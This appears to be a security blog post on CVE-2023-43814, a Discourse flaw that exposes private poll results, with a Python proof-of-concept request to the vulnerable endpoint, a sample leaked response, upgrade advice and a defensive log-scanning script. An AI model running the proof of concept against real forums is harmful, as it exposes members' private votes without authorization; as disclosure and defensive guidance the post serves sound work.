CVE-2023-43814 - Private Poll Leaks in Discourse—How Attackers Could See Poll Results Meant to Stay Secret
Discourse has become the go-to platform for hosting online forums, Q&As, and community discussions. Its open source flexibility and rich features make it a choice for many organizations and communities. But with popularity comes the risk of security issues—and CVE-2023-43814 is one that hits right at the heart of privacy: private polls.
This post breaks down what CVE-2023-43814 is all about, how it can be exploited, and what you can do to stay safe.
What is Discourse, and What’s Special About Polls?
Discourse allows users to embed polls in posts. These are popular for voting, feedback, and fun. Sometimes, poll results are intended to be private or viewable only by a restricted group (for example, admins or invited members). This encourages more honest answers.
However, a security flaw was discovered that erodes this privacy guarantee.
What Is CVE-2023-43814?
CVE-2023-43814 is a vulnerability in Discourse where attackers who know certain details about a poll within a topic can access the /polls/grouped_poll_results endpoint. By doing this, they can retrieve:
- Poll choices/options
- The number of votes each group of participants cast
Even if the poll results were set as "private" (only viewable by authorized users), this endpoint could leak information to unauthorized users.
Impacted Versions: All versions prior to 3.1.1 (Stable) and 3.2..beta2 (Beta).
Severity: Medium (can reveal sensitive community opinions, votes, etc.)
How Does The Exploit Work?
The attacker needs to know some details about the poll they’re targeting (for example, the topic ID and poll name/identifier).
Retrieve Poll Identifiers
By scraping the page or guessing, the attacker finds the poll's unique identifier (poll_name or similar) and topic ID.
Send a Request to the Vulnerable Endpoint
They craft a POST request to /polls/grouped_poll_results with the relevant parameters.
Receive Restricted Poll Results
Discourse responds with JSON data containing vote counts and option text, even if the user isn’t allowed to see them.
Let’s see how this could look in code with Python and requests:
```python
import requests

# Settings: Replace with your target site info
base_url = "https://YOURDISCOURCEURL"
topic_id = 123  # Replace with the target topic ID
poll_name = "poll1"  # Replace with the poll's identifier
endpoint = f"{base_url}/polls/grouped_poll_results.json"

# Prepare headers as needed (if not logged in, some endpoints may still leak)
payload = {
    "topic_id": topic_id,
    "poll_name": poll_name
}
response = requests.post(endpoint, data=payload)
if response.status_code == 200:
    print("Poll results leaked!")
    print(response.json())
else:
    print("No access or poll not found.")
```
What Does the Response Look Like?
```json
{
  "results": {
    "options": [
      {"id": 1, "text": "Option A", "votes": 8},
      {"id": 2, "text": "Option B", "votes": 15},
      {"id": 3, "text": "Option C", "votes": 2}
    ]
  }
}
```
Why Is This a Big Deal?
- Breach of Trust: Members expect their votes or opinions to stay secret in private or delayed-reveal polls. This bug exposes them.
- Sensitive Content Leak: Internal company votes, moderation team elections, or sensitive public sentiment can all be revealed.
- No Workaround: There is no configuration change or “quick fix” to mitigate this. Upgrading Discourse is the only way out.
How Was This Fixed?
The Discourse team released 3.1.1 (Stable) and 3.2..beta2 (Beta) to patch this. The fix adds permission checks to the /polls/grouped_poll_results endpoint, blocking unauthorized access to private poll results.
Upgrade Immediately!
If you manage a Discourse instance, it is critical to upgrade to at least 3.1.1 (Stable branch) or 3.2..beta2 (Beta branch).
No Patch = At Risk
Because there is no workaround, not upgrading leaves your community exposed.
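To review whether the endpoint was queried before you upgraded, here is an added example (not part of the original post and not Discourse's own code) that scans web server access logs for successful requests to /polls/grouped_poll_results and groups them by client. The nginx/Apache "combined" log format, the function names, and the sample log lines are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/polls/grouped_poll_results"  # endpoint named in this post

# Assumed log format: nginx/Apache "combined". Adjust the regex for other formats.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_poll_result_requests(lines):
    """Yield one dict per successful (2xx) request to the poll results endpoint."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed or differently formatted lines
        url = urlsplit(m["target"])
        path = url.path.removesuffix(".json").rstrip("/")
        if path != ENDPOINT or not m["status"].startswith("2"):
            continue
        query = parse_qs(url.query)
        yield {
            "ip": m["ip"], "ts": m["ts"], "method": m["method"],
            # Query parameters only appear in the log when sent in the URL.
            "topic_id": query.get("topic_id", [None])[0],
            "poll_name": query.get("poll_name", [None])[0],
        }

def summarize_by_client(lines):
    """Group hits by client IP so repeated requests from one source stand out."""
    hits = defaultdict(list)
    for hit in find_poll_result_requests(lines):
        hits[hit["ip"]].append(hit)
    return dict(hits)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Oct/2023:10:01:02 +0000] "POST /polls/grouped_poll_results.json HTTP/1.1" 200 412 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [12/Oct/2023:10:01:03 +0000] "GET /polls/grouped_poll_results?topic_id=123&poll_name=poll1 HTTP/1.1" 200 398 "-" "python-requests/2.31.0"',
    '198.51.100.9 - - [12/Oct/2023:10:02:10 +0000] "POST /polls/grouped_poll_results.json HTTP/1.1" 403 51 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Oct/2023:10:02:30 +0000] "GET /t/some-topic/123 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in summarize_by_client(SAMPLE_LOG).items():
        print(ip, len(hits), [(h["method"], h["topic_id"], h["poll_name"]) for h in hits])
```

Hits are leads to review against who was allowed to see each poll, not proof of abuse; request bodies are not logged, so POST requests will show no topic or poll name.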
Conclusion
CVE-2023-43814 is a plain example of how a seemingly minor oversight can have big privacy consequences. No matter the forum size, if you rely on private polls for sensitive matters, this patch is a must.
Don’t wait. Upgrade your Discourse now and keep your community’s trust.
*Feel free to share this post with your fellow admins and moderators to keep everyone safe!*
Timeline
Published on: 10/16/2023 22:15:12 UTC
Last modified on: 10/20/2023 17:48:38 UTC